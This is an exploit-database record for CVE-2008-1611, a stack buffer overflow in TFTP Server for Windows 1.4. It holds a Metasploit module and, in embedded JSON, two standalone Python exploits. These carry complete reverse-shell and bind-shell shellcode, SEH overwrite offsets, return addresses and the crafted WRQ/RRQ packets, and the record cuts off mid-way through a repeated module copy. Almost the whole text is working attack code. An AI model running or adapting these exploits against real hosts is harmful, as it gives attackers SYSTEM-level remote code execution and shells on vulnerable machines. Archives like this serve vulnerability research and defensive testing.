TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow
2012-04-20T00:00:00
ID EDB-ID:18759 Type exploitdb Reporter metasploit Modified 2012-04-20T00:00:00
Description
TFTP Server for Windows 1.4 ST WRQ Buffer Overflow. CVE-2008-1611. Remote exploit for windows platform
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw
is due to the way TFTP handles the filename parameter extracted from a WRQ request.
The server will append the user-supplied filename to TFTP server binary's path
without any bounds checking, and then attempt to open this with a fopen(). Since
this isn't a valid file path, fopen() returns null, which allows the corrupted
data to be used in a strcmp() function, causing an access violation.
Since the offset is sensitive to how the TFTP server is launched, you must know
in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'
, and then manually select your target accordingly. A successful attempt will lead
to remote code execution under the context of SYSTEM if run as a service, or
the user if run as a standalone. A failed attempt will result a denial-of-service.
},
'Author' =>
[
'Mati Aharoni', #Initial discovery, PoC
'Datacut' #Metasploit
],
'References' =>
[
[ 'CVE', '2008-1611' ],
[ 'OSVDB', '43785' ],
[ 'BID', '18345' ],
[ 'EDB', '5314' ]
],
'DefaultOptions' =>
{
'EXITFUNC' =>'seh',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x2f",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
# datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1.
# possible may work for other service packs and or vista
# Rets = P/P/R from tftpserversp.exe
[ 'Windows XP SP2/SP3 EN Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ],
[ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ],
[ 'Windows 7 SP0/SP1 EN x64 Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ],
[ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ],
[ 'Windows 7 SP0/SP1 EN x86 Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ],
[ 'Windows 7 SP0/SP1 EN x86 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1507} ]
],
'Privileged' => false,
'DisclosureDate'=> 'Mar 26 2008',
'DefaultTarget' => 4)) #TFTP is installed as a service
register_options(
[
Opt::RPORT(69)
], self.class)
end
def exploit
connect_udp
nops = make_nops(50)
lead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - nops.length)
near = "\xe9\x80\xfd\xff\xff" #jump back 640 bytes to the nop sled
nseh = "\xeb\xf9" + make_nops(2) #jump back 7 bytes to the long jump
evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')
mode = "netascii"
#Send the WRQ packet (header "\x00\x02")
sploit = "\x00\x02" + evil + "\0" + mode +"\0"
udp_sock.put(sploit)
handler
disconnect_udp
end
end
{"id": "EDB-ID:18759", "hash": "ef70087e664931dbbeeb128e455b1b9e", "type": "exploitdb", "bulletinFamily": "exploit", "title": "TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow", "description": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow. CVE-2008-1611. Remote exploit for windows platform", "published": "2012-04-20T00:00:00", "modified": "2012-04-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/18759/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2008-1611"], "lastseen": "2016-02-02T10:23:57", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-1611"]}, {"type": "exploitdb", "idList": ["EDB-ID:18345", "EDB-ID:5314"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:112007"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/TFTP/TFTPSERVER_WRQ_BOF"]}], "modified": "2016-02-02T10:23:57"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/18759/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tRank = NormalRanking\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw\r\n\t\t\t\tis due to the way TFTP handles the filename parameter extracted from a WRQ request.\r\n\t\t\t\tThe server will append the user-supplied filename to TFTP server binary's path\r\n\t\t\t\twithout any bounds checking, and then attempt to open this with a fopen(). Since\r\n\t\t\t\tthis isn't a valid file path, fopen() returns null, which allows the corrupted\r\n\t\t\t\tdata to be used in a strcmp() function, causing an access violation.\r\n\r\n\t\t\t\tSince the offset is sensitive to how the TFTP server is launched, you must know\r\n\t\t\t\tin advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'\r\n\t\t\t\t, and then manually select your target accordingly. A successful attempt will lead\r\n\t\t\t\tto remote code execution under the context of SYSTEM if run as a service, or\r\n\t\t\t\tthe user if run as a standalone. A failed attempt will result a denial-of-service.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Mati Aharoni', #Initial discovery, PoC\r\n\t\t\t\t\t'Datacut' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-1611' ],\r\n\t\t\t\t\t[ 'OSVDB', '43785' ],\r\n\t\t\t\t\t[ 'BID', '18345' ],\r\n\t\t\t\t\t[ 'EDB', '5314' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' =>'seh',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 600,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\",\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1.\r\n\t\t\t\t\t# possible may work for other service packs and or vista\r\n\t\t\t\t\t# Rets = P/P/R from tftpserversp.exe\r\n\t\t\t\t\t[ 'Windows XP SP2/SP3 EN Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ],\r\n\t\t\t\t\t[ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ],\r\n\t\t\t\t\t[ 'Windows 7 SP0/SP1 EN x64 Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ],\r\n\t\t\t\t\t[ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ],\r\n\t\t\t\t\t[ 'Windows 7 SP0/SP1 EN x86 Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ],\r\n\t\t\t\t\t[ 'Windows 7 SP0/SP1 EN x86 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1507} ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> false,\r\n\t\t\t'DisclosureDate'=> 'Mar 26 2008',\r\n\t\t\t'DefaultTarget' => 4)) #TFTP is installed as a service\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(69)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tnops = make_nops(50)\r\n\t\tlead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - nops.length)\r\n\t\tnear = \"\\xe9\\x80\\xfd\\xff\\xff\" #jump back 640 bytes to the nop sled\r\n\t\tnseh = \"\\xeb\\xf9\" + make_nops(2) #jump back 7 bytes to the long jump\r\n\r\n\t\tevil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')\r\n\t\tmode = \"netascii\"\r\n\r\n\t\t#Send the WRQ packet (header \"\\x00\\x02\")\r\n\t\tsploit = \"\\x00\\x02\" + evil + \"\\0\" + mode +\"\\0\"\r\n\r\n\t\tudp_sock.put(sploit)\r\n\r\n\t\thandler\r\n\t\tdisconnect_udp\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["43785"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-09-29T14:25:50", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in TFTP Server SP 1.4 for Windows allows remote attackers to cause a denial of service or execute arbitrary code via a long filename in a read or write request.", "modified": "2017-09-28T21:30:47", "published": "2008-04-01T12:44:00", "id": "CVE-2008-1611", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1611", "title": "CVE-2008-1611", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T09:34:14", "bulletinFamily": "exploit", "description": "TFTP Server 1.4 - ST (RRQ) Buffer Overflow Exploit. CVE-2008-1611. Remote exploit for windows platform", "modified": "2012-01-10T00:00:00", "published": "2012-01-10T00:00:00", "id": "EDB-ID:18345", "href": "https://www.exploit-db.com/exploits/18345/", "type": "exploitdb", "title": "TFTP Server 1.4 - ST RRQ Buffer Overflow Exploit", "sourceData": "#!/usr/bin/python\r\n\r\n#---------------------------------------------------------------------------#\r\n# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow) #\r\n# OS: Windows XP PRO SP3 #\r\n# Author: b33f #\r\n#---------------------------------------------------------------------------#\r\n# Smashing the stack for fun and practise... #\r\n# #\r\n# This tftp service have been pwned extensively: #\r\n# (1) Muts ==> WRQ Overflow #\r\n# http://www.exploit-db.com/exploits/5314/ #\r\n# (2) Molotov ==> WRQ Overflow #\r\n# http://www.exploit-db.com/exploits/10542/ #\r\n# (3) tixxDZ ==> ERROR Overflow #\r\n# http://www.exploit-db.com/exploits/5563/ #\r\n# #\r\n#---------------------------------------------------------------------------#\r\n# After some simple fuzzing with spike I discovered that sending a Read #\r\n# Request (RRQ) packet can also trigger a buffer overflow... #\r\n#---------------------------------------------------------------------------#\r\n# It might take up to 30 seconds for some reason but the shell does appear #\r\n# as expected.... #\r\n# #\r\n# root@bt:~# nc -lvp 9988 #\r\n# listening on [any] 9988 ... #\r\n# 192.168.111.128: inverse host lookup failed: Unknown server error #\r\n# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072 #\r\n# Microsoft Windows XP [Version 5.1.2600] #\r\n# (C) Copyright 1985-2001 Microsoft Corp. #\r\n# #\r\n# C:\\Program Files\\TFTPServer> #\r\n#---------------------------------------------------------------------------#\r\n\r\nimport socket\r\nimport sys\r\n\r\nhost = '192.168.111.128'\r\nport = 69\r\n\r\ntry:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n \r\nexcept:\r\n print \"socket() failed\"\r\n sys.exit(1)\r\n\r\n#msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b '\\x00'\r\n#x86/shikata_ga_nai succeeded with size 341 (iteration=1)\r\nshell = (\r\n\"\\xbb\\x3c\\xef\\xdb\\xc5\\xdb\\xdd\\xd9\\x74\\x24\\xf4\\x5a\\x29\\xc9\\xb1\"\r\n\"\\x4f\\x31\\x5a\\x14\\x83\\xc2\\x04\\x03\\x5a\\x10\\xde\\x1a\\x27\\x2d\\x97\"\r\n\"\\xe5\\xd8\\xae\\xc7\\x6c\\x3d\\x9f\\xd5\\x0b\\x35\\xb2\\xe9\\x58\\x1b\\x3f\"\r\n\"\\x82\\x0d\\x88\\xb4\\xe6\\x99\\xbf\\x7d\\x4c\\xfc\\x8e\\x7e\\x61\\xc0\\x5d\"\r\n\"\\xbc\\xe0\\xbc\\x9f\\x91\\xc2\\xfd\\x6f\\xe4\\x03\\x39\\x8d\\x07\\x51\\x92\"\r\n\"\\xd9\\xba\\x45\\x97\\x9c\\x06\\x64\\x77\\xab\\x37\\x1e\\xf2\\x6c\\xc3\\x94\"\r\n\"\\xfd\\xbc\\x7c\\xa3\\xb6\\x24\\xf6\\xeb\\x66\\x54\\xdb\\xe8\\x5b\\x1f\\x50\"\r\n\"\\xda\\x28\\x9e\\xb0\\x13\\xd0\\x90\\xfc\\xff\\xef\\x1c\\xf1\\xfe\\x28\\x9a\"\r\n\"\\xea\\x75\\x43\\xd8\\x97\\x8d\\x90\\xa2\\x43\\x18\\x05\\x04\\x07\\xba\\xed\"\r\n\"\\xb4\\xc4\\x5c\\x65\\xba\\xa1\\x2b\\x21\\xdf\\x34\\xf8\\x59\\xdb\\xbd\\xff\"\r\n\"\\x8d\\x6d\\x85\\xdb\\x09\\x35\\x5d\\x42\\x0b\\x93\\x30\\x7b\\x4b\\x7b\\xec\"\r\n\"\\xd9\\x07\\x6e\\xf9\\x5b\\x4a\\xe7\\xce\\x51\\x75\\xf7\\x58\\xe2\\x06\\xc5\"\r\n\"\\xc7\\x58\\x81\\x65\\x8f\\x46\\x56\\x89\\xba\\x3e\\xc8\\x74\\x45\\x3e\\xc0\"\r\n\"\\xb2\\x11\\x6e\\x7a\\x12\\x1a\\xe5\\x7a\\x9b\\xcf\\xa9\\x2a\\x33\\xa0\\x09\"\r\n\"\\x9b\\xf3\\x10\\xe1\\xf1\\xfb\\x4f\\x11\\xfa\\xd1\\xf9\\x16\\x6d\\x1a\\x51\"\r\n\"\\xf7\\xea\\xf2\\xa0\\x07\\xd4\\x06\\x2c\\xe1\\x70\\x17\\x78\\xba\\xec\\x8e\"\r\n\"\\x21\\x30\\x8c\\x4f\\xfc\\xd0\\x2d\\xdd\\x9b\\x20\\x3b\\xfe\\x33\\x77\\x6c\"\r\n\"\\x30\\x4a\\x1d\\x80\\x6b\\xe4\\x03\\x59\\xed\\xcf\\x87\\x86\\xce\\xce\\x06\"\r\n\"\\x4a\\x6a\\xf5\\x18\\x92\\x73\\xb1\\x4c\\x4a\\x22\\x6f\\x3a\\x2c\\x9c\\xc1\"\r\n\"\\x94\\xe6\\x73\\x88\\x70\\x7e\\xb8\\x0b\\x06\\x7f\\x95\\xfd\\xe6\\xce\\x40\"\r\n\"\\xb8\\x19\\xfe\\x04\\x4c\\x62\\xe2\\xb4\\xb3\\xb9\\xa6\\xc5\\xf9\\xe3\\x8f\"\r\n\"\\x4d\\xa4\\x76\\x92\\x13\\x57\\xad\\xd1\\x2d\\xd4\\x47\\xaa\\xc9\\xc4\\x22\"\r\n\"\\xaf\\x96\\x42\\xdf\\xdd\\x87\\x26\\xdf\\x72\\xa7\\x62\")\r\n\r\n#---------------------------------------------------------------------------#\r\n# (1) Stage1: 0x00409605 TFTPServer.exe - PPR #\r\n# => 3-byte overwrite using the mandatory protocol null-byte. #\r\n# (2) Stage2: jump back 5-bytes \"\\xEB\\xF9\" so we have room for a far jump. #\r\n# (3) Stage3: jump back 1490-bytes to the beginning of our buffer. #\r\n# (4) Stage4: reverse shell port 9988 - size 341 #\r\n#---------------------------------------------------------------------------#\r\n\r\nstage4 = \"\\x90\"*50 + shell\r\nstage3 = \"\\xE9\\x2E\\xFA\\xFF\\xFF\"\r\nstage2 = \"\\xEB\\xF9\\x90\\x90\"\r\nstage1 = \"\\x05\\x96\\x40\"\r\n\r\nfilename = stage4 + \"A\"*(1487-len(stage4)) + stage3 + stage2 + stage1\r\n\r\n\r\nmode = \"netascii\"\r\nyoulose = \"\\x00\\x01\" + filename + \"\\x00\" + mode + \"\\x00\"\r\ns.sendto(youlose, (host, port))", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18345/"}, {"lastseen": "2016-01-31T22:57:00", "bulletinFamily": "exploit", "description": "TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day). CVE-2008-1611. Remote exploit for windows platform", "modified": "2008-03-26T00:00:00", "published": "2008-03-26T00:00:00", "id": "EDB-ID:5314", "href": "https://www.exploit-db.com/exploits/5314/", "type": "exploitdb", "title": "TFTP Server for Windows 1.4 - ST Buffer Overflow Exploit 0day", "sourceData": "#!/usr/bin/python\r\n# TFTP Server for Windows V1.4 ST (0day)\r\n# http://sourceforge.net/projects/tftp-server/\r\n# Tested on Windows Vista SP0.\r\n# Coded by Mati Aharoni\r\n# muts..at..offensive-security.com\r\n# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt\r\n##################################################################\r\n# bt ~ # sourceforge-tftpd.py\r\n# [*] TFTP Server for Windows V1.4 ST (0day)\r\n# [*] http://www.offensive-security.com\r\n# [*] Sending evil packet, ph33r\r\n# [*] Check port 4444 for bindshell\r\n# bt ~ # nc -v 172.16.167.134 4444\r\n# (UNKNOWN) [172.16.167.134] 4444 (krb524) open\r\n# Microsoft Windows [Version 6.0.6000]\r\n# Copyright (c) 2006 Microsoft Corporation. All \r\n# rights reserved.\r\n#\r\n# C:\\Windows\\system32>\r\n##################################################################\r\n\r\nimport socket\r\nimport sys\r\n\r\nprint \"[*] TFTP Server for Windows V1.4 ST (0day)\"\r\nprint \"[*] http://www.offensive-security.com\"\r\n\r\nhost = '172.16.167.134'\r\nport = 69\r\n\r\ntry:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nexcept:\r\n print \"socket() failed\"\r\n sys.exit(1)\r\n\r\n# Jump back shellcode\r\nsc = \"\\x6a\\x05\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x16\\x91\\x9c\"\r\nsc +=\"\\x30\\x83\\xeb\\xfc\\xe2\\xf4\\xcf\\x7f\\x45\\x44\\x32\\x65\\xc5\\xb0\\xd7\\x9b\"\r\nsc +=\"\\x0c\\xce\\xdb\\x6f\\x51\\xcf\\xf7\\x91\\x9c\\x30\"\r\n\r\n# windows/shell_bind_tcp - 317 bytes\r\n# http://www.metasploit.com\r\n# EXITFUNC=seh, LPORT=4444\r\n\r\nshell=(\"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b\"\r\n\"\\x45\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01\"\r\n\"\\xeb\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07\"\r\n\"\\xc1\\xca\\x0d\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f\"\r\n\"\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b\"\r\n\"\\x89\\x6c\\x24\\x1c\\x61\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\"\r\n\"\\x8b\\x70\\x1c\\xad\\x8b\\x40\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff\"\r\n\"\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0\"\r\n\"\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\"\r\n\"\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\\xf5\\xad\\x57\\xff\\xd6\\x53\"\r\n\"\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\\x66\\x68\\x11\\x5c\\x66\"\r\n\"\\x53\\x89\\xe1\\x95\\x68\\xa4\\x1a\\x70\\xc7\\x57\\xff\\xd6\\x6a\\x10\\x51\"\r\n\"\\x55\\xff\\xd0\\x68\\xa4\\xad\\x2e\\xe9\\x57\\xff\\xd6\\x53\\x55\\xff\\xd0\"\r\n\"\\x68\\xe5\\x49\\x86\\x49\\x57\\xff\\xd6\\x50\\x54\\x54\\x55\\xff\\xd0\\x93\"\r\n\"\\x68\\xe7\\x79\\xc6\\x79\\x57\\xff\\xd6\\x55\\xff\\xd0\\x66\\x6a\\x64\\x66\"\r\n\"\\x68\\x63\\x6d\\x89\\xe5\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89\"\r\n\"\\xe2\\x31\\xc0\\xf3\\xaa\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x93\\x8d\\x7a\\x38\"\r\n\"\\xab\\xab\\xab\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x44\\xff\\xd6\\x5b\\x57\"\r\n\"\\x52\\x51\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\"\r\n\"\\x05\\xce\\x53\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x8b\\x57\\xfc\\x83\"\r\n\"\\xc4\\x64\\xff\\xd6\\x52\\xff\\xd0\\x68\\xf0\\x8a\\x04\\x5f\\x53\\xff\\xd6\"\r\n\"\\xff\\xd0\")\r\n\r\nfilename = \"\\x90\"*860 + shell + \"\\x90\"*14 + sc + \"\\xeb\\xd0\\x90\\x90\" + \"\\x2b\\x0e\\x41\"\r\n\r\nmode = \"netascii\"\r\n\r\nmuha = \"\\x00\\x02\" + filename+ \"\\0\" + mode+ \"\\0\" \r\n\r\nprint \"[*] Sending evil packet, ph33r\"\r\ns.sendto(muha, (host, port))\r\nprint \"[*] Check port 4444 for bindshell\"\r\n\r\n# milw0rm.com [2008-03-26]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/5314/"}], "packetstorm": [{"lastseen": "2016-12-05T22:11:57", "bulletinFamily": "exploit", "description": "", "modified": "2012-04-20T00:00:00", "published": "2012-04-20T00:00:00", "href": "https://packetstormsecurity.com/files/112007/TFTP-Server-for-Windows-1.4-ST-WRQ-Buffer-Overflow.html", "id": "PACKETSTORM:112007", "type": "packetstorm", "title": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \nRank = NormalRanking \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow', \n'Description' => %q{ \nThis module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw \nis due to the way TFTP handles the filename parameter extracted from a WRQ request. \nThe server will append the user-supplied filename to TFTP server binary's path \nwithout any bounds checking, and then attempt to open this with a fopen(). Since \nthis isn't a valid file path, fopen() returns null, which allows the corrupted \ndata to be used in a strcmp() function, causing an access violation. \n \nSince the offset is sensitive to how the TFTP server is launched, you must know \nin advance if your victim machine launched the TFTP as a 'Service' or 'Standalone' \n, and then manually select your target accordingly. A successful attempt will lead \nto remote code execution under the context of SYSTEM if run as a service, or \nthe user if run as a standalone. A failed attempt will result a denial-of-service. \n}, \n'Author' => \n[ \n'Mati Aharoni', #Initial discovery, PoC \n'Datacut' #Metasploit \n], \n'References' => \n[ \n[ 'CVE', '2008-1611' ], \n[ 'OSVDB', '43785' ], \n[ 'BID', '18345' ], \n[ 'EDB', '5314' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' =>'seh', \n}, \n'Payload' => \n{ \n'Space' => 600, \n'BadChars' => \"\\x00\\x2f\", \n'StackAdjustment' => -3500 \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1. \n# possible may work for other service packs and or vista \n# Rets = P/P/R from tftpserversp.exe \n[ 'Windows XP SP2/SP3 EN Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ], \n[ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ], \n[ 'Windows 7 SP0/SP1 EN x64 Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ], \n[ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ], \n[ 'Windows 7 SP0/SP1 EN x86 Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ], \n[ 'Windows 7 SP0/SP1 EN x86 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1507} ] \n], \n'Privileged' => false, \n'DisclosureDate'=> 'Mar 26 2008', \n'DefaultTarget' => 4)) #TFTP is installed as a service \n \nregister_options( \n[ \nOpt::RPORT(69) \n], self.class) \nend \n \n \ndef exploit \nconnect_udp \n \nnops = make_nops(50) \nlead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - nops.length) \nnear = \"\\xe9\\x80\\xfd\\xff\\xff\" #jump back 640 bytes to the nop sled \nnseh = \"\\xeb\\xf9\" + make_nops(2) #jump back 7 bytes to the long jump \n \nevil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V') \nmode = \"netascii\" \n \n#Send the WRQ packet (header \"\\x00\\x02\") \nsploit = \"\\x00\\x02\" + evil + \"\\0\" + mode +\"\\0\" \n \nudp_sock.put(sploit) \n \nhandler \ndisconnect_udp \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112007/tftpserver_wrq_bof.rb.txt"}], "metasploit": [{"lastseen": "2019-01-30T00:15:36", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw is due to the way TFTP handles the filename parameter extracted from a WRQ request. The server will append the user-supplied filename to TFTP server binary's path without any bounds checking, and then attempt to check this path with a fopen(). Since this isn't a valid file path, fopen() returns null, which allows the corrupted data to be used in a strcmp() function, causing an access violation. Since the offset is sensitive to how the TFTP server is launched, you must know in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone' , and then manually select your target accordingly. A successful attempt will lead to remote code execution under the context of SYSTEM if run as a service, or the user if run as a standalone. A failed attempt will result a denial-of-service.", "modified": "2017-07-24T13:26:21", "published": "2012-04-20T01:23:19", "id": "MSF:EXPLOIT/WINDOWS/TFTP/TFTPSERVER_WRQ_BOF", "href": "", "type": "metasploit", "title": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n include Msf::Exploit::Remote::Udp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',\n 'Description' => %q{\n This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw\n is due to the way TFTP handles the filename parameter extracted from a WRQ request.\n The server will append the user-supplied filename to TFTP server binary's path\n without any bounds checking, and then attempt to check this path with a fopen().\n Since this isn't a valid file path, fopen() returns null, which allows the\n corrupted data to be used in a strcmp() function, causing an access violation.\n\n Since the offset is sensitive to how the TFTP server is launched, you must know\n in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'\n , and then manually select your target accordingly. A successful attempt will lead\n to remote code execution under the context of SYSTEM if run as a service, or\n the user if run as a standalone. A failed attempt will result a denial-of-service.\n },\n 'Author' =>\n [\n 'Mati Aharoni', #Initial discovery, PoC\n 'Datacut' #Metasploit\n ],\n 'References' =>\n [\n [ 'CVE', '2008-1611' ],\n [ 'OSVDB', '43785' ],\n [ 'BID', '18345' ],\n [ 'EDB', '5314' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' =>'seh',\n },\n 'Payload' =>\n {\n 'Space' => 600,\n 'BadChars' => \"\\x00\\x2f\",\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1.\n # possible may work for other service packs and or vista\n # Rets = P/P/R from tftpserversp.exe\n [ 'Windows XP SP2/SP3 EN Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ],\n [ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ],\n [ 'Windows 7 SP0/SP1 EN x64 